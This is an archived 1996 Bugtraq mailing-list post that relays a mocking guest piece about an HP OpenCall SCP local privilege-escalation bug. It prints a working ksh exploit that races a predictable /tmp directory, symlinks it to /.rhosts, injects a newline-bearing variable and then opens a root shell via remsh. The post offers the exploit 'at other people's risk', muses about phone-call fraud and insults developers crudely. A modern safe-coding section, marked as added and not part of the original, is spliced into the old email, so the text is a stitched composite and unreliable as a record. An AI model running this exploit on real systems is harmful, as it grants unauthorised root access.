[3769] in bugtraq
Other Folks Scripts
daemon@ATHENA.MIT.EDU (Aleph One)
Mon Dec 9 03:59:38 1996
Date: Mon, 9 Dec 1996 02:50:35 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Guest Scriptor: Otto Sync
Exploit: OpenCall platform bug
Shout out: Thanks, Otto, we couldn't have said it better ourselves!
Sure you all see Hewlett Packard as the pure American company, and you
blame all these Yankee coders for the bugs that we see here week after
week. Big mistake! Stupidity is evenly distributed. Today we're going
to investigate the French arm of HP, located in Grenoble in the Alps,
in this division where the most elite products come from: the
Telecommunication Network Organisation. Hello to all the Grenoble
folks! Near the mountains are developed products such as their IN
(Intelligent Network) platforms, and the OpenCall SCP software is
being written by half drunk French skiers who thought HP stands for
"Habitation Prolongée" (long term accommodation). No kidding, stop
the lunchtime drinking, switch off that Minitel connected to 3615
ANALSEX and think of all those operators put in danger by your
dubious programming practices.
Shall we tell you that HP delivers their IN platform with umask 000 as
a default and don't see this as a problem? The idiots! Do you want to
know how some of their log files keep being 666 and want to overwrite
any of root's files? Yes, yes, it's true! No, let's deal with
something more fancy, the guys at SOD would be disappointed to see
such trivial exploits. They have more than one trick up their sleeve,
these damn scripters.
While I'm here as a guest scriptor, one word for HP executives and
lawyers. Yes, even those in Grenoble who think they have concentrated
all of human intelligence in a single place. Make the SOD guys a decent
offer, give them some contract work to start with, maybe a nice
package with a Maserati company car and one all-year ski pass. OK,
fine, it can be a French car, but not a Citroën. Think about all the
unreleased bugs! Think about your children! Think about endangered
species! Be reasonable, you will surely find them a nice warm little
spot with a view of Mont Blanc. The survival of humanity is at stake.
Let's get back to the bug, if you don't mind. All right, it's not every
day that you come across a SCP, but remember that most phone network
operators have or will have one. And when you know that this gentle
high-availability system can control every signalling message at
various detection points in the call model, you start to wonder. What
about creating a special IN service that entitles all your outgoing
calls to a 99% charging discount? Would you have fun rerouting all
calls directed at the police station to HP's helpdesk? Do you finally
realise that your slapdash code endangers the stability of the
networks it is installed on?
Have a look at the code. It's self-explanatory. Use at other people's
risk.
_________________________________________________________________
BUG1 : diagSCP
Synopsis
========
The diagSCP utility creates a temporary directory in /tmp with a predictable
name. It will also happily follow any evil symlink you put in. The 'env' file
created by diagSCP in this directory contains the user's environment and is
thus subject to customization. We just have to insert some ^J in a variable
to have it go to the next line, so it looks like a valid entry in .rhosts.
Exploit
=======
#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i
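For contrast, here is how the same scratch-directory and env-file dance should be done; this is an added example, not code from the original post or from HP's diagSCP, and the function names and the <NL> marker are assumptions. It closes all three holes the synopsis lists: the name is unpredictable, a pre-planted directory or symlinked 'env' is refused instead of followed, and a variable containing a newline can no longer spill a second line that reads like a .rhosts entry.

```sh
# Added example (not the original post's or HP's code): the safe version of
# what diagSCP does. Function names and the <NL> marker are assumptions.

# Scratch directory with an unpredictable name, created mode 0700 by
# mktemp, which fails rather than reuse a directory someone pre-planted.
safe_tmpdir() {
    mktemp -d "${TMPDIR:-/tmp}/diagSCP.XXXXXX"
}

# Dump the environment to $1/env without following anything an attacker
# planted: refuse a directory that is itself a symlink, and open 'env' with
# noclobber (set -C), which makes '>' use O_CREAT|O_EXCL so a pre-existing
# path, including a symlink to /.rhosts, makes the open fail instead of
# writing through it. Values are printed one per line with embedded
# newlines replaced by a visible <NL> marker, so no variable can produce
# a second line that looks like a valid .rhosts entry.
write_env_file() {
    dir=$1
    [ -d "$dir" ] && [ ! -h "$dir" ] || return 1
    ( set -C
      awk 'BEGIN {
          for (k in ENVIRON) {
              v = ENVIRON[k]
              gsub(/\n/, "<NL>", v)
              print k "=" v
          }
      }' > "$dir/env"
    ) 2>/dev/null || return 1
}
```

Usage: `d=$(safe_tmpdir) && write_env_file "$d"`; a non-zero return means the write was refused and nothing was touched.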
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01